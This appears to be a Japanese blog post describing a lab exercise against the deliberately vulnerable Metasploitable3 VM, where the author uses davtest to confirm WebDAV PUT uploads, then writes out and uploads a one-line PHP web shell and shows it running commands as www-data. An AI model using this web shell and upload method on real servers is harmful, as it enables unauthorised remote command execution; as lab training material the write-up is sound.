LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@tsuko5963

Metasploitable3 ファイルアップロードの脆弱性

Posted at

Metasploitable3をOpenVASで脆弱性スキャンを行った結果、uploadsフォルダにPUT,DELETEメソッドが有効であるという結果があったため、検証します。
スクリーンショット 2025-05-04 170321.png
davtestを使用します。
Metasploitable3のIPアドレス:192.168.56.123

GIT CLONE

以下のコマンドで、git cloneします。

git clone https://github.com/cldrn/davtest.git

検証

作成されたdavtestフォルダで以下のコマンドを実行します。

perl davtest.pl -url http://192.168.56.123/uploads/

結果

********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.56.123/uploads
********************************************************
NOTE	Random string for this session: V0TtUsb1tJFU
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU
********************************************************
 Sending test files
PUT	php	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
PUT	cgi	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cgi
PUT	html	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
PUT	shtml	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.shtml
PUT	jhtml	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jhtml
PUT	txt	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
PUT	cfm	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cfm
PUT	jsp	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jsp
PUT	asp	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.asp
PUT	pl	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.pl
PUT	aspx	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.aspx
********************************************************
 Checking for test file execution
EXEC	php	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
EXEC	php	FAIL
EXEC	cgi	FAIL
EXEC	html	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
EXEC	html	FAIL
EXEC	shtml	FAIL
EXEC	jhtml	FAIL
EXEC	txt	SUCCEED:	http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
EXEC	txt	FAIL
EXEC	cfm	FAIL
EXEC	jsp	FAIL
EXEC	asp	FAIL
EXEC	pl	FAIL
EXEC	aspx	FAIL

********************************************************
davtest.pl Summary:
Created: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cgi
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.shtml
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jhtml
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.cfm
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.jsp
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.asp
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.pl
PUT File: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.aspx
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.php
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.html
Executes: http://192.168.56.123/uploads/DavTestDir_V0TtUsb1tJFU/davtest_V0TtUsb1tJFU.txt

PHPは、アップロードできるようなので、WebShellをアップロードしてみます。
davtestフォルダに以下のファイルを用意します。

webshell.php
<?php echo system($_GET['cmd']); ?>

以下のコマンドを実行します。

perl davtest.pl -url http://192.168.56.123/uploads/ -uploadfile ./webshell.php -uploadloc webshell.php

ブラウザから、http://192.168.56.123/uploads/webshell.php?cmd=idにアクセルすると、実行結果が表示されます。

uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?